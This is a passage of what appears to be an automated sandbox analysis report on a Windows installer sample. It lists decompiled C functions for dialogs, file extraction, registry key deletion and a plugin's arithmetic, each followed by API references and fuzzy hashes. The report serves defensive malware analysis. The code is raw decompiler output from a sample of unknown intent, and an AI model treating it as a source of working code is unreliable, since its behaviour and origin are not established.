                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                                                          • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                                                          • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                                                          • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                          				long _v8;
                                                                                                                          				signed char _v12;
                                                                                                                          				unsigned int _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				long _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				long _t15;
                                                                                                                          				unsigned int _t19;
                                                                                                                          				signed int _t25;
                                                                                                                          				struct HWND__* _t28;
                                                                                                                          
                                                                                                                          				_t28 = _a4;
                                                                                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                          				if(_a8 == 0) {
                                                                                                                          					L4:
                                                                                                                          					_v56 = _t15;
                                                                                                                          					_v60 = 4;
                                                                                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                          					return _v24;
                                                                                                                          				}
                                                                                                                          				_t19 = GetMessagePos();
                                                                                                                          				_v16 = _t19 >> 0x10;
                                                                                                                          				_v20 = _t19;
                                                                                                                          				ScreenToClient(_t28,  &_v20);
                                                                                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                          				if((_v12 & 0x00000066) != 0) {
                                                                                                                          					_t15 = _v8;
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				return _t25 | 0xffffffff;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
                                                                                                                          • GetMessagePos.USER32 ref: 00404C47
                                                                                                                          • ScreenToClient.USER32 ref: 00404C61
                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                          • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                          • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                          				char _v68;
                                                                                                                          				void* _t11;
                                                                                                                          				CHAR* _t19;
                                                                                                                          
                                                                                                                          				if(_a8 == 0x110) {
                                                                                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                          					_a8 = 0x113;
                                                                                                                          				}
                                                                                                                          				if(_a8 == 0x113) {
                                                                                                                          					_t11 = E00402E36();
                                                                                                                          					_t19 = "unpacking data: %d%%";
                                                                                                                          					if( *0x42f454 == 0) {
                                                                                                                          						_t19 = "verifying installer: %d%%";
                                                                                                                          					}
                                                                                                                          					wsprintfA( &_v68, _t19, _t11);
                                                                                                                          					SetWindowTextA(_a4,  &_v68);
                                                                                                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                                                          • wsprintfA.USER32 ref: 00402E09
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00402E2B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                                                          • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                                                          • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                                                          • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E004027DF(void* __ebx, void* __eflags) {
                                                                                                                          				void* _t26;
                                                                                                                          				long _t31;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t54;
                                                                                                                          				void* _t55;
                                                                                                                          				void* _t56;
                                                                                                                          
                                                                                                                          				_t45 = __ebx;
                                                                                                                          				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                                                          				_t50 = E00402BCE(0xfffffff0);
                                                                                                                          				 *(_t56 - 0x78) = _t23;
                                                                                                                          				if(E00405C52(_t50) == 0) {
                                                                                                                          					E00402BCE(0xffffffed);
                                                                                                                          				}
                                                                                                                          				E00405DC1(_t50);
                                                                                                                          				_t26 = E00405DE6(_t50, 0x40000000, 2);
                                                                                                                          				 *(_t56 + 8) = _t26;
                                                                                                                          				if(_t26 != 0xffffffff) {
                                                                                                                          					_t31 =  *0x42f458;
                                                                                                                          					 *(_t56 - 0x30) = _t31;
                                                                                                                          					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                          					if(_t49 != _t45) {
                                                                                                                          						E0040343E(_t45);
                                                                                                                          						E00403428(_t49,  *(_t56 - 0x30));
                                                                                                                          						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                                          						 *(_t56 - 0x38) = _t54;
                                                                                                                          						if(_t54 != _t45) {
                                                                                                                          							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                                                          							while( *_t54 != _t45) {
                                                                                                                          								_t47 =  *_t54;
                                                                                                                          								_t55 = _t54 + 8;
                                                                                                                          								 *(_t56 - 0x8c) =  *_t54;
                                                                                                                          								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                          								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                                                                          							}
                                                                                                                          							GlobalFree( *(_t56 - 0x38));
                                                                                                                          						}
                                                                                                                          						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                                                          						GlobalFree(_t49);
                                                                                                                          						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                                                          					}
                                                                                                                          					CloseHandle( *(_t56 + 8));
                                                                                                                          				}
                                                                                                                          				_t51 = 0xfffffff3;
                                                                                                                          				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                                                          					_t51 = 0xffffffef;
                                                                                                                          					DeleteFileA( *(_t56 - 0x78));
                                                                                                                          					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				_push(_t51);
                                                                                                                          				E00401423();
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040288E
                                                                                                                          • GlobalFree.KERNEL32 ref: 004028A1
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2667972263-0
                                                                                                                          • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                                                          • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                                                          • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                                                          • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E70481837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                                                                          				void* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				char _v52;
                                                                                                                          				void _t45;
                                                                                                                          				void _t46;
                                                                                                                          				signed int _t47;
                                                                                                                          				signed int _t48;
                                                                                                                          				signed int _t57;
                                                                                                                          				signed int _t58;
                                                                                                                          				signed int _t59;
                                                                                                                          				signed int _t60;
                                                                                                                          				signed int _t61;
                                                                                                                          				void* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t69;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t71;
                                                                                                                          				signed int _t77;
                                                                                                                          				void* _t81;
                                                                                                                          				signed int _t83;
                                                                                                                          				signed int _t85;
                                                                                                                          				signed int _t87;
                                                                                                                          				signed int _t90;
                                                                                                                          				void* _t101;
                                                                                                                          
                                                                                                                          				_t85 = __edx;
                                                                                                                          				 *0x7048405c = _a8;
                                                                                                                          				_t77 = 0;
                                                                                                                          				 *0x70484060 = _a16;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_v8 = E7048123B();
                                                                                                                          				_t90 = E704812FE(_t42);
                                                                                                                          				_t87 = _t85;
                                                                                                                          				_t81 = E7048123B();
                                                                                                                          				_a8 = _t81;
                                                                                                                          				_t45 =  *_t81;
                                                                                                                          				if(_t45 != 0x7e && _t45 != 0x21) {
                                                                                                                          					_a16 = E7048123B();
                                                                                                                          					_t77 = E704812FE(_t74);
                                                                                                                          					_v12 = _t85;
                                                                                                                          					GlobalFree(_a16);
                                                                                                                          					_t81 = _a8;
                                                                                                                          				}
                                                                                                                          				_t46 =  *_t81;
                                                                                                                          				_t101 = _t46 - 0x2f;
                                                                                                                          				if(_t101 > 0) {
                                                                                                                          					_t47 = _t46 - 0x3c;
                                                                                                                          					__eflags = _t47;
                                                                                                                          					if(_t47 == 0) {
                                                                                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                                                                                                          						if( *((char*)(_t81 + 1)) != 0x3c) {
                                                                                                                          							__eflags = _t87 - _v12;
                                                                                                                          							if(__eflags > 0) {
                                                                                                                          								L56:
                                                                                                                          								_t48 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								L57:
                                                                                                                          								asm("cdq");
                                                                                                                          								L58:
                                                                                                                          								_t90 = _t48;
                                                                                                                          								_t87 = _t85;
                                                                                                                          								L59:
                                                                                                                          								E70481429(_t85, _t90, _t87,  &_v52);
                                                                                                                          								E70481266( &_v52);
                                                                                                                          								GlobalFree(_v8);
                                                                                                                          								return GlobalFree(_a8);
                                                                                                                          							}
                                                                                                                          							if(__eflags < 0) {
                                                                                                                          								L49:
                                                                                                                          								__eflags = 0;
                                                                                                                          								L50:
                                                                                                                          								_t48 = 1;
                                                                                                                          								goto L57;
                                                                                                                          							}
                                                                                                                          							__eflags = _t90 - _t77;
                                                                                                                          							if(_t90 < _t77) {
                                                                                                                          								goto L49;
                                                                                                                          							}
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          						_t85 = _t87;
                                                                                                                          						_t48 = E70482EF0(_t90, _t77, _t85);
                                                                                                                          						goto L58;
                                                                                                                          					}
                                                                                                                          					_t57 = _t47 - 1;
                                                                                                                          					__eflags = _t57;
                                                                                                                          					if(_t57 == 0) {
                                                                                                                          						__eflags = _t90 - _t77;
                                                                                                                          						if(_t90 != _t77) {
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          						__eflags = _t87 - _v12;
                                                                                                                          						if(_t87 != _v12) {
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          						goto L49;
                                                                                                                          					}
                                                                                                                          					_t58 = _t57 - 1;
                                                                                                                          					__eflags = _t58;
                                                                                                                          					if(_t58 == 0) {
                                                                                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
                                                                                                                          						if( *((char*)(_t81 + 1)) != 0x3e) {
                                                                                                                          							__eflags = _t87 - _v12;
                                                                                                                          							if(__eflags < 0) {
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							if(__eflags > 0) {
                                                                                                                          								goto L49;
                                                                                                                          							}
                                                                                                                          							__eflags = _t90 - _t77;
                                                                                                                          							if(_t90 <= _t77) {
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							goto L49;
                                                                                                                          						}
                                                                                                                          						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                                                                                                          						_t85 = _t87;
                                                                                                                          						_t59 = _t90;
                                                                                                                          						_t83 = _t77;
                                                                                                                          						if( *((char*)(_t81 + 2)) != 0x3e) {
                                                                                                                          							_t48 = E70482F10(_t59, _t83, _t85);
                                                                                                                          						} else {
                                                                                                                          							_t48 = E70482F40(_t59, _t83, _t85);
                                                                                                                          						}
                                                                                                                          						goto L58;
                                                                                                                          					}
                                                                                                                          					_t60 = _t58 - 0x20;
                                                                                                                          					__eflags = _t60;
                                                                                                                          					if(_t60 == 0) {
                                                                                                                          						_t90 = _t90 ^ _t77;
                                                                                                                          						_t87 = _t87 ^ _v12;
                                                                                                                          						goto L59;
                                                                                                                          					}
                                                                                                                          					_t61 = _t60 - 0x1e;
                                                                                                                          					__eflags = _t61;
                                                                                                                          					if(_t61 == 0) {
                                                                                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                                                                                                          						if( *((char*)(_t81 + 1)) != 0x7c) {
                                                                                                                          							_t90 = _t90 | _t77;
                                                                                                                          							_t87 = _t87 | _v12;
                                                                                                                          							goto L59;
                                                                                                                          						}
                                                                                                                          						__eflags = _t90 | _t87;
                                                                                                                          						if((_t90 | _t87) != 0) {
                                                                                                                          							goto L49;
                                                                                                                          						}
                                                                                                                          						__eflags = _t77 | _v12;
                                                                                                                          						if((_t77 | _v12) != 0) {
                                                                                                                          							goto L49;
                                                                                                                          						}
                                                                                                                          						goto L56;
                                                                                                                          					}
                                                                                                                          					__eflags = _t61 == 0;
                                                                                                                          					if(_t61 == 0) {
                                                                                                                          						_t90 =  !_t90;
                                                                                                                          						_t87 =  !_t87;
                                                                                                                          					}
                                                                                                                          					goto L59;
                                                                                                                          				}
                                                                                                                          				if(_t101 == 0) {
                                                                                                                          					L21:
                                                                                                                          					__eflags = _t77 | _v12;
                                                                                                                          					if((_t77 | _v12) != 0) {
                                                                                                                          						_v24 = E70482D80(_t90, _t87, _t77, _v12);
                                                                                                                          						_v20 = _t85;
                                                                                                                          						_t48 = E70482E30(_t90, _t87, _t77, _v12);
                                                                                                                          						_t81 = _a8;
                                                                                                                          					} else {
                                                                                                                          						_v24 = _v24 & 0x00000000;
                                                                                                                          						_v20 = _v20 & 0x00000000;
                                                                                                                          						_t48 = _t90;
                                                                                                                          						_t85 = _t87;
                                                                                                                          					}
                                                                                                                          					__eflags =  *_t81 - 0x2f;
                                                                                                                          					if( *_t81 != 0x2f) {
                                                                                                                          						goto L58;
                                                                                                                          					} else {
                                                                                                                          						_t90 = _v24;
                                                                                                                          						_t87 = _v20;
                                                                                                                          						goto L59;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t67 = _t46 - 0x21;
                                                                                                                          				if(_t67 == 0) {
                                                                                                                          					_t48 = 0;
                                                                                                                          					__eflags = _t90 | _t87;
                                                                                                                          					if((_t90 | _t87) != 0) {
                                                                                                                          						goto L57;
                                                                                                                          					}
                                                                                                                          					goto L50;
                                                                                                                          				}
                                                                                                                          				_t68 = _t67 - 4;
                                                                                                                          				if(_t68 == 0) {
                                                                                                                          					goto L21;
                                                                                                                          				}
                                                                                                                          				_t69 = _t68 - 1;
                                                                                                                          				if(_t69 == 0) {
                                                                                                                          					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                                                                                                          					if( *((char*)(_t81 + 1)) != 0x26) {
                                                                                                                          						_t90 = _t90 & _t77;
                                                                                                                          						_t87 = _t87 & _v12;
                                                                                                                          						goto L59;
                                                                                                                          					}
                                                                                                                          					__eflags = _t90 | _t87;
                                                                                                                          					if((_t90 | _t87) == 0) {
                                                                                                                          						goto L56;
                                                                                                                          					}
                                                                                                                          					__eflags = _t77 | _v12;
                                                                                                                          					if((_t77 | _v12) == 0) {
                                                                                                                          						goto L56;
                                                                                                                          					}
                                                                                                                          					goto L49;
                                                                                                                          				}
                                                                                                                          				_t70 = _t69 - 4;
                                                                                                                          				if(_t70 == 0) {
                                                                                                                          					_t48 = E70482D40(_t90, _t87, _t77, _v12);
                                                                                                                          					goto L58;
                                                                                                                          				} else {
                                                                                                                          					_t71 = _t70 - 1;
                                                                                                                          					if(_t71 == 0) {
                                                                                                                          						_t90 = _t90 + _t77;
                                                                                                                          						asm("adc edi, [ebp-0x8]");
                                                                                                                          					} else {
                                                                                                                          						if(_t71 == 0) {
                                                                                                                          							_t90 = _t90 - _t77;
                                                                                                                          							asm("sbb edi, [ebp-0x8]");
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L59;
                                                                                                                          				}
                                                                                                                          			}





























                                                                                                                          0x704818b2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x704818b4
                                                                                                                          0x704818b5
                                                                                                                          0x704818eb
                                                                                                                          0x704818ef
                                                                                                                          0x70481907
                                                                                                                          0x70481909
                                                                                                                          0x00000000
                                                                                                                          0x70481909
                                                                                                                          0x704818f1
                                                                                                                          0x704818f3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x704818f9
                                                                                                                          0x704818fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481902
                                                                                                                          0x704818b7
                                                                                                                          0x704818ba
                                                                                                                          0x704818e1
                                                                                                                          0x00000000
                                                                                                                          0x704818bc
                                                                                                                          0x704818bc
                                                                                                                          0x704818bd
                                                                                                                          0x704818d1
                                                                                                                          0x704818d3
                                                                                                                          0x704818bf
                                                                                                                          0x704818c1
                                                                                                                          0x704818c7
                                                                                                                          0x704818c9
                                                                                                                          0x704818c9
                                                                                                                          0x704818c1
                                                                                                                          0x00000000
                                                                                                                          0x704818bd

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2979337801-0
                                                                                                                          • Opcode ID: 142f49915c4e6a73cb4c0a7cd1bff5afa4d4daff96b681c720646457320e9a3a
                                                                                                                          • Instruction ID: 35174dc87e59844e660265d975c2beaebeb12b43bcb6abd5bc53e3c2be3e50be
                                                                                                                          • Opcode Fuzzy Hash: 142f49915c4e6a73cb4c0a7cd1bff5afa4d4daff96b681c720646457320e9a3a
                                                                                                                          • Instruction Fuzzy Hash: 725127B2D00154EEDB06AFA4C8805AEBBBDAB41245F140C9FE406A33F4C27D6D42C752
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                                                          				void* _v8;
                                                                                                                          				int _v12;
                                                                                                                          				char _v276;
                                                                                                                          				void* _t27;
                                                                                                                          				signed int _t33;
                                                                                                                          				intOrPtr* _t35;
                                                                                                                          				signed int _t45;
                                                                                                                          				signed int _t46;
                                                                                                                          				signed int _t47;
                                                                                                                          
                                                                                                                          				_t46 = _a12;
                                                                                                                          				_t47 = _t46 & 0x00000300;
                                                                                                                          				_t45 = _t46 & 0x00000001;
                                                                                                                          				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                                                          				if(_t27 == 0) {
                                                                                                                          					if((_a12 & 0x00000002) == 0) {
                                                                                                                          						L3:
                                                                                                                          						_push(0x105);
                                                                                                                          						_push( &_v276);
                                                                                                                          						_push(0);
                                                                                                                          						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                                                          							__eflags = _t45;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								L10:
                                                                                                                          								RegCloseKey(_v8);
                                                                                                                          								return 0x3eb;
                                                                                                                          							}
                                                                                                                          							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                                                                          							__eflags = _t33;
                                                                                                                          							if(_t33 != 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_push(0x105);
                                                                                                                          							_push( &_v276);
                                                                                                                          							_push(_t45);
                                                                                                                          						}
                                                                                                                          						RegCloseKey(_v8);
                                                                                                                          						_t35 = E00406656(3);
                                                                                                                          						if(_t35 != 0) {
                                                                                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                          						}
                                                                                                                          						return RegDeleteKeyA(_a4, _a8);
                                                                                                                          					}
                                                                                                                          					_v12 = 0;
                                                                                                                          					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                          						goto L10;
                                                                                                                          					}
                                                                                                                          					goto L3;
                                                                                                                          				}
                                                                                                                          				return _t27;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1354259210-0
                                                                                                                          • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                          • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                                                                          • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                          • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00401D65(void* __ebx, void* __edx) {
                                                                                                                          				struct HWND__* _t30;
                                                                                                                          				CHAR* _t38;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t53;
                                                                                                                          				signed int _t55;
                                                                                                                          				signed int _t58;
                                                                                                                          				long _t61;
                                                                                                                          				void* _t65;
                                                                                                                          
                                                                                                                          				_t53 = __ebx;
                                                                                                                          				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                                                          				} else {
                                                                                                                          					E00402BAC(2);
                                                                                                                          					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                                                          				}
                                                                                                                          				_t55 =  *(_t65 - 0x1c);
                                                                                                                          				 *(_t65 + 8) = _t30;
                                                                                                                          				_t58 = _t55 & 0x00000004;
                                                                                                                          				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                                                          				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                                                          				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                          				if((_t55 & 0x00010000) == 0) {
                                                                                                                          					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                                                          				} else {
                                                                                                                          					_t38 = E00402BCE(0x11);
                                                                                                                          				}
                                                                                                                          				 *(_t65 - 8) = _t38;
                                                                                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                                                          				asm("sbb edi, edi");
